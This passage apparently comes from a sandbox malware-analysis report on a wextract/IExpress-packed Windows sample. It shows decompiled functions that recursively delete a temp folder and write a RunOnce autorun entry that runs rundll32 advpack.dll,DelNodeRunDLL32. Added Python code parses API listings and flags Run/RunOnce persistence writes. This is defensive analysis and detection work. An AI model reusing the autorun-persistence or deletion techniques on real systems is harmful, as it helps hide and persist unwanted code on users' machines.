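    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ONLY = re.compile(r"[0-9A-Fa-f]+")
# %TEMP%\IXPnnn.TMP is the extraction-folder name used by wextract.exe (IExpress).
IXP_DIR = re.compile(r"\\Temp\\IXP\d{3}\.TMP\\?", re.IGNORECASE)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int               # address of the call instruction
    parent: Optional[int]  # set when the sandbox attributes the call to a subcall function


@dataclass
class ResolvedImport:
    symbol: str
    library: Optional[str]
    load_ref: Optional[int]
    resolve_ref: int
    call_ref: Optional[int]


def parse_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' block into ApiCall records; skip anything else."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("name"), m.group("module").upper(), args,
                             int(m.group("ref"), 16), parent))
    return calls


def find_dynamic_imports(calls: List[ApiCall]) -> List[ResolvedImport]:
    """Pair GetProcAddress(.., Name) with the nearest preceding LoadLibrary* in the
    same function and with the first later direct call of Name (heuristic)."""
    local = sorted((c for c in calls if c.parent is None), key=lambda c: c.ref)
    found: List[ResolvedImport] = []
    for i, c in enumerate(local):
        if c.name != "GetProcAddress" or len(c.args) < 2:
            continue
        symbol = c.args[1]
        if symbol in ("", "?") or HEX_ONLY.fullmatch(symbol):
            continue  # export name not recovered (ordinal or unknown); nothing to pair
        library, load_ref = None, None
        for prev in reversed(local[:i]):
            if prev.name.startswith("LoadLibrary"):
                dlls = [a for a in prev.args if a.lower().endswith(".dll")]
                library = dlls[0].lower() if dlls else None
                load_ref = prev.ref
                break
        call_ref = next((n.ref for n in local[i + 1:] if n.name == symbol), None)
        found.append(ResolvedImport(symbol, library, load_ref, c.ref, call_ref))
    return found


def find_extraction_dirs(calls: List[ApiCall]) -> List[str]:
    """Arguments that name a wextract-style IXPnnn.TMP folder."""
    return sorted({a for c in calls for a in c.args if IXP_DIR.search(a)})


def _hex(v: Optional[int]) -> str:
    return f"{v:08X}" if v is not None else "n/a"


def summarize(text: str) -> List[str]:
    calls = parse_listing(text)
    lines = [
        f"{r.symbol} resolved at runtime from {r.library or 'unknown library'}: "
        f"LoadLibrary @{_hex(r.load_ref)}, GetProcAddress @{_hex(r.resolve_ref)}, "
        f"call @{_hex(r.call_ref)}"
        for r in find_dynamic_imports(calls)
    ]
    lines += [f"wextract-style extraction folder referenced: {p}"
              for p in find_extraction_dirs(calls)]
    return lines


if __name__ == "__main__":
    for line in summarize(SAMPLE_LISTING):
        print(line)
```

Calls attributed to a subcall function (the LocalAlloc line) are parsed but excluded from the pairing, since their ref addresses belong to a different function and would otherwise distort the "nearest preceding LoadLibrary" search. The same parser applies to the APIs block of any other function in the report.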
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
• API String ID: 2126469477-4070797333
• Opcode ID: a684144c431942f3a097a697d609fb929b6753000cc1155821ccb3a1dbaccfc8
• Instruction ID: 29612ed1919998d773bb1eeb686294417d5814ba6739626837e24aa68e2bcba9
• Opcode Fuzzy Hash: a684144c431942f3a097a697d609fb929b6753000cc1155821ccb3a1dbaccfc8
• Instruction Fuzzy Hash: 9841C670A006059ADF33BB759C4A76B33BCEB85750F02016BE943C6291EF75CE80CA61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 86%
                                                                                                                                                                                                    			E00392390(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                    				_t21 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                    				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                    				_t65 = __ecx;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                    					_pop(_t66);
                                                                                                                                                                                                    					_pop(_t46);
                                                                                                                                                                                                    					return E00396CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00391680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                    					_t58 = 0x104;
                                                                                                                                                                                                    					E003916B3( &_v280, 0x104, "*");
                                                                                                                                                                                                    					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                    					_t63 = _t22;
                                                                                                                                                                                                    					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t58 = 0x104;
                                                                                                                                                                                                    						E00391680( &_v276, 0x104, _t65);
                                                                                                                                                                                                    						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                    							_t58 = 0x104;
                                                                                                                                                                                                    							E003916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                    							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                    							DeleteFileA( &_v280);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                    								E003916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                    								_t58 = 0x104;
                                                                                                                                                                                                    								E0039658A( &_v280, 0x104, 0x391140);
                                                                                                                                                                                                    								E00392390( &_v284);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                    					} while (_t36 != 0);
                                                                                                                                                                                                    					FindClose(_t63); // executed
                                                                                                                                                                                                    					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00398A3A,003911F4,00398A3A,00000000,?,?), ref: 003923F6
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,003911F8), ref: 00392427
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,003911FC), ref: 0039243B
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00392495
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 003924A3
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003924AF
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 003924BE
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00398A3A), ref: 003924C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                    • Opcode ID: 22ce4ec4612d0c2eddca7d6466bd79209861e034f25791dea81a029821d6bada
                                                                                                                                                                                                    • Instruction ID: 14a57b2f2b1072cb4603d55d0168a9d21e30bf84afb95e0904242fea1593b188
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22ce4ec4612d0c2eddca7d6466bd79209861e034f25791dea81a029821d6bada
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31B731604B41ABDB23DB64CC8AAEB73ECAFC4305F04492EF55586290EB74990DC792
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                    			E00392BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				struct HINSTANCE__* _t12;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				signed char _t19;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                    				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                    					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t17 = _t21;
                                                                                                                                                                                                    							 *0x39a288(0, 1, 0, 0);
                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
				}
				_t20 = _a12;
				_t18 = _a4;
				*0x399124 = 0; // global HRESULT slot, cleared before the call chain below
				if(E00392CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00392F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E003952B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 = *0x398a3a; // 0x0
						if(_t32 == 0) {
							_t19 = *0x399a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00391F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 = *0x398588; // 0x0, global handle; only closed when it was ever set
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 = *0x399124; // 0x80070002 = HRESULT_FROM_WIN32(ERROR_FILE_NOT_FOUND)
				return _t7;
			}


APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00396BB0,00390000,00000000,00000002,0000000A), ref: 00392C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00396BB0,00390000,00000000,00000002,0000000A), ref: 00392C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00392C28
• CloseHandle.KERNEL32(00000000,?,?,00396BB0,00390000,00000000,00000002,0000000A), ref: 00392C98
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 881c7fa91edd4eda45107672ffe956e579aea758158084747bb8e82a7d7666e1
• Instruction ID: a3600abe7c5092d751f4c667fefcd56e1c0a7ed84e4092788b7378542d12188d
• Opcode Fuzzy Hash: 881c7fa91edd4eda45107672ffe956e579aea758158084747bb8e82a7d7666e1
• Instruction Fuzzy Hash: E211C231201A067BDF237BB9AC89E6F375DAB89390F060517FD41E7251DA32DC418AA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00396F40() {

				SetUnhandledExceptionFilter(E00396EF0); // executed; installs E00396EF0 as the process-wide top-level exception filter
				return 0;
			}


APIs
• SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00396F45
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 02c7f93cbabe2fe458ba9c765fe0eb0c140e13df05532069b333c02a0bcc4ee6
• Instruction ID: 14b7a42205eb2cf94190f0a01e030c7a9f1a42202129acacadc9c2801816f0ca
• Opcode Fuzzy Hash: 02c7f93cbabe2fe458ba9c765fe0eb0c140e13df05532069b333c02a0bcc4ee6
• Instruction Fuzzy Hash: 7790026465250047DA121B749E1A45575995A4D783F815561E011C4494DB6144405552
Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
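
The next function, E0039202A, opens HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce with read/write access, the classic autorun persistence location. The following Python is an added detection example and is not part of the Joe Sandbox report or of the sample: it scores Sysmon-style registry events (Event ID 12 key create, Event ID 13 value set) that touch Run/RunOnce keys, escalating when the writer or the autorun command lives in a user-writable directory. The event records are constructed, and the key pattern, the user-writable directory list and the severity rules are this example's own assumptions.

```python
"""Added example: flag autorun persistence writes (Run/RunOnce) in Sysmon-style registry events.

Not part of the Joe Sandbox report or the sample; the event records below are constructed
and the key patterns and severity rules are this example's own assumptions.
"""
import re
from dataclasses import dataclass

# Autorun keys; E0039202A targets HKLM\...\CurrentVersion\RunOnce. Longest names are listed
# first so the alternation cannot stop at "Run" when the path says "RunOnce".
AUTORUN_KEY_RE = re.compile(
    r"^(?P<hive>HKLM|HKCU|HKU\\[^\\]+)\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\"
    r"(?P<key>RunServicesOnce|RunServices|RunOnceEx|RunOnce|Run)(?:\\(?P<value>.+))?$",
    re.IGNORECASE,
)

# Locations a dropper commonly executes from or stages its payload in (assumed list).
USER_WRITABLE_RE = re.compile(
    r"(?:\\Users\\[^\\]+\\AppData\\|\\Users\\[^\\]+\\Downloads\\|\\Windows\\Temp\\|\\ProgramData\\)",
    re.IGNORECASE,
)

LEVELS = ("low", "medium", "high")


@dataclass
class RegistryEvent:
    event_id: int        # Sysmon 12 = key created/deleted, 13 = value set
    event_type: str      # "CreateKey", "SetValue", ...
    image: str           # process that performed the registry write
    target_object: str   # registry path in Sysmon's HKLM\... / HKU\<SID>\... form
    details: str = ""    # value data (event 13 only)


@dataclass
class Finding:
    severity: str
    hive: str
    key: str
    value_name: str
    image: str
    reason: str


def parse_autorun_target(target_object):
    """Return (hive, key, value_name) when the path is an autorun key or a value under one, else None."""
    m = AUTORUN_KEY_RE.match(target_object)
    if m is None:
        return None
    return m.group("hive").upper(), m.group("key"), m.group("value") or ""


def assess(event):
    """Score one registry event; None when it does not touch an autorun key."""
    parsed = parse_autorun_target(event.target_object)
    if parsed is None:
        return None
    hive, key, value_name = parsed
    # Writing a value is more telling than merely opening or creating the key.
    level = 1 if event.event_id == 13 else 0
    reasons = [f"{event.event_type} on {hive}\\...\\{key}"]
    if event.event_id == 13 and USER_WRITABLE_RE.search(event.details):
        level = 2
        reasons.append("autorun command points into a user-writable directory")
    if USER_WRITABLE_RE.search(event.image):
        # A machine-wide autorun set by a process in %TEMP%/%APPDATA% is the pattern seen above.
        level = 2 if hive == "HKLM" else max(level, 1)
        reasons.append("writer runs from a user-writable directory")
    return Finding(LEVELS[level], hive, key, value_name, event.image, "; ".join(reasons))


def scan(events):
    """Return the findings for every event that touched an autorun key, in input order."""
    return [f for f in (assess(e) for e in events) if f is not None]


# Constructed sample events (not taken from the report).
SAMPLE_EVENTS = [
    RegistryEvent(13, "SetValue", r"C:\Users\victim\AppData\Local\Temp\file.exe",
                  r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Updater",
                  r"C:\Users\victim\AppData\Roaming\svchost.exe"),
    RegistryEvent(13, "SetValue", r"C:\Program Files\Vendor\setup.exe",
                  r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\VendorCleanup",
                  r"C:\Program Files\Vendor\cleanup.exe /silent"),
    RegistryEvent(13, "SetValue", r"C:\Windows\explorer.exe",
                  r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
                  "DWORD (0x00000001)"),
    RegistryEvent(12, "CreateKey", r"C:\Users\victim\Downloads\file.exe",
                  r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.hive}\\...\\{f.key}\\{f.value_name} by {f.image}: {f.reason}")
```

On the constructed input the first event (HKLM RunOnce value set from %TEMP%, pointing at a payload in %APPDATA%) scores high, the vendor installer's RunOnce entry scores medium, the Explorer setting is ignored, and the key creation under a user hive from Downloads scores medium. In production the user-writable list and an allow-list for known installers would be tuned per environment.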


                                                                                                                                                                                                    C-Code - Quality: 93%
			E0039202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 = *0x398004; // 0x74c05eb4, /GS security cookie
				_v8 = _t28 ^ _t93; // stack canary: cookie XOR frame pointer, checked before return
				_t84 = 0x104;
				memset( &_v268, 0, 0x104); // two MAX_PATH (0x104 bytes) buffers zeroed
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				// 0x80000002 = HKEY_LOCAL_MACHINE, 0x2001f = KEY_READ | KEY_WRITE: opens (or creates) the
				// machine-wide RunOnce autorun key with write access; _v532 receives the key handle and
				// _v536 the disposition (created vs. opened).
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                    					return E00396CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(_t86);
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0039171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                    					_t95 = _t95 + 0x10;
                                                                                                                                                                                                    					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t87 = _t87 + 1;
                                                                                                                                                                                                    					if(_t87 < 0xc8) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t87 != 0xc8) {
                                                                                                                                                                                                    					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                    					_t79 = _t84;
                                                                                                                                                                                                    					E0039658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                    					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                    					_t84 = _t46;
                                                                                                                                                                                                    					if(_t84 == 0) {
                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x399a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                    							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							_pop(_t86);
                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                    						_t81 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0x3991e5;
                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3991e5);
                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                    							 *0x398580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    							E0039171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                    						E003944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    						E0039658A( &_v268, 0x104, 0x391140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0x398530 = _t66;
                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x003921cb
                                                                                                                                                                                                    0x003921f1
                                                                                                                                                                                                    0x003921f6
                                                                                                                                                                                                    0x003921fd
                                                                                                                                                                                                    0x003921ff
                                                                                                                                                                                                    0x003921ff
                                                                                                                                                                                                    0x00392204
                                                                                                                                                                                                    0x00392213
                                                                                                                                                                                                    0x00392218
                                                                                                                                                                                                    0x0039221d
                                                                                                                                                                                                    0x0039221d
                                                                                                                                                                                                    0x00392220
                                                                                                                                                                                                    0x00392220
                                                                                                                                                                                                    0x00392222
                                                                                                                                                                                                    0x00392223
                                                                                                                                                                                                    0x00392229
                                                                                                                                                                                                    0x0039223d
                                                                                                                                                                                                    0x00392249
                                                                                                                                                                                                    0x00392250
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392250
                                                                                                                                                                                                    0x003921d2
                                                                                                                                                                                                    0x003921d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003921d9
                                                                                                                                                                                                    0x0039213a
                                                                                                                                                                                                    0x00392141
                                                                                                                                                                                                    0x00392144
                                                                                                                                                                                                    0x0039214c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392163
                                                                                                                                                                                                    0x00392172
                                                                                                                                                                                                    0x00392172
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392163
                                                                                                                                                                                                    0x003920ea
                                                                                                                                                                                                    0x003920f0
                                                                                                                                                                                                    0x00000000

APIs
• memset.MSVCRT ref: 00392050
• memset.MSVCRT ref: 0039205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0039208C
  • Part of subcall function 0039171E: _vsnprintf.MSVCRT ref: 00391750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003920C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003920EA
• GetSystemDirectoryA.KERNEL32 ref: 00392103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00392134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392144
• GetSystemDirectoryA.KERNEL32 ref: 0039215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0039218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003921C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003921E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0039223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392249
